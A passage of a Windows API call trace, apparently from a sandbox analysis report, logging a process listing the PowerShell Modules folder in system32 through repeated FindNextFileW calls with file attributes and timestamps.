ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetLbfo", cAlternateFileName="")) returned 1 [0225.991] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa52a044, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa52a044, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetNat", cAlternateFileName="")) returned 1 [0225.991] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa550297, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa550297, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetQos", cAlternateFileName="")) returned 1 [0225.992] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSecurity", cAlternateFileName="NETSEC~1")) returned 1 [0225.992] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa59c748, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa59c748, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetSwitchTeam", cAlternateFileName="NETSWI~1")) returned 1 [0225.992] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5c29a2, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5c29a2, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetTCPIP", cAlternateFileName="")) returned 1 [0225.992] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13483f1, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13483f1, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkConnectivityStatus", cAlternateFileName="NETWOR~1")) returned 1 [0225.992] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchManager", cAlternateFileName="NETWOR~2")) returned 1 [0225.992] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13483f1, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x13948a6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x13948a6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkTransition", cAlternateFileName="NETWOR~3")) returned 1 [0225.993] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PcsvDevice", cAlternateFileName="PCSVDE~1")) returned 1 [0225.993] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PKI", cAlternateFileName="")) returned 1 [0225.993] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa5e8c01, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa5e8c01, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="PNPDEV~1")) returned 1 [0225.993] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6350b6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6350b6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="PRINTM~1")) returned 1 [0225.993] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13948a6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="PSDESI~1")) returned 1 [0225.993] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="PSDIAG~1")) returned 1 [0225.994] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="PSSCHE~1")) returned 1 [0225.994] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="PSWORK~1")) returned 1 [0225.994] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa6f3c72, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa6f3c72, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="PSWORK~2")) returned 1 [0225.994] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa719ec9, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa719ec9, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="SCHEDU~1")) returned 1 [0225.994] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="SECURE~1")) returned 1 [0225.994] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0225.994] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="SMBWIT~1")) returned 1 [0225.995] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa740124, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa740124, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="STARTL~1")) returned 1 [0225.995] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa78c5d5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa78c5d5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0225.995] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0225.995] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="TROUBL~1")) returned 1 [0225.995] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="TRUSTE~1")) returned 1 [0225.995] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="VPNCLI~1")) returned 1 [0225.995] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0225.996] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7d8a8a, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7d8a8a, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="WINDOW~1")) returned 1 [0225.996] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="WINDOW~2")) returned 1 [0225.996] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe947242, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe947242, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="WINDOW~3")) returned 1 [0225.996] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13e0d5f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa7fece8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa7fece8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="WINDOW~4")) returned 1 [0225.996] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0225.996] FindClose (in: hFindFile=0x1a5cf670 | out: hFindFile=0x1a5cf670) returned 1 [0225.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe5f0) returned 1 [0225.997] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe5b0) returned 1 [0225.997] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe6a0) returned 1 [0226.001] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x1b7fe190, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32 [0226.001] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", nBufferLength=0x105, lpBuffer=0x1b7fe130, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\", lpFilePart=0x0) returned 0x33 [0226.001] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\*", lpFindFileData=0x1b7fe340 | out: lpFindFileData=0x1b7fe340*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5cf670 [0226.001] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0226.002] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa208ee8, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa208ee8, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask", cAlternateFileName="APPBAC~1")) returned 1 [0226.002] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker", cAlternateFileName="APPLOC~1")) returned 1 [0226.002] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx", cAlternateFileName="")) returned 1 [0226.002] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AssignedAccess", cAlternateFileName="ASSIGN~1")) returned 1 [0226.003] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitLocker", cAlternateFileName="BITLOC~1")) returned 1 [0226.003] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BitsTransfer", cAlternateFileName="BITSTR~1")) returned 1 [0226.003] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BranchCache", cAlternateFileName="BRANCH~1")) returned 1 [0226.003] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa22f14e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa22f14e, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CimCmdlets", cAlternateFileName="CIMCMD~1")) returned 1 [0226.004] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa255399, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa255399, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Defender", cAlternateFileName="")) returned 1 [0226.004] FindNextFileW (in: hFindFile=0x1a5cf670, lpFindFileData=0x1b7fe390 | out: lpFindFileData=0x1b7fe390*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, 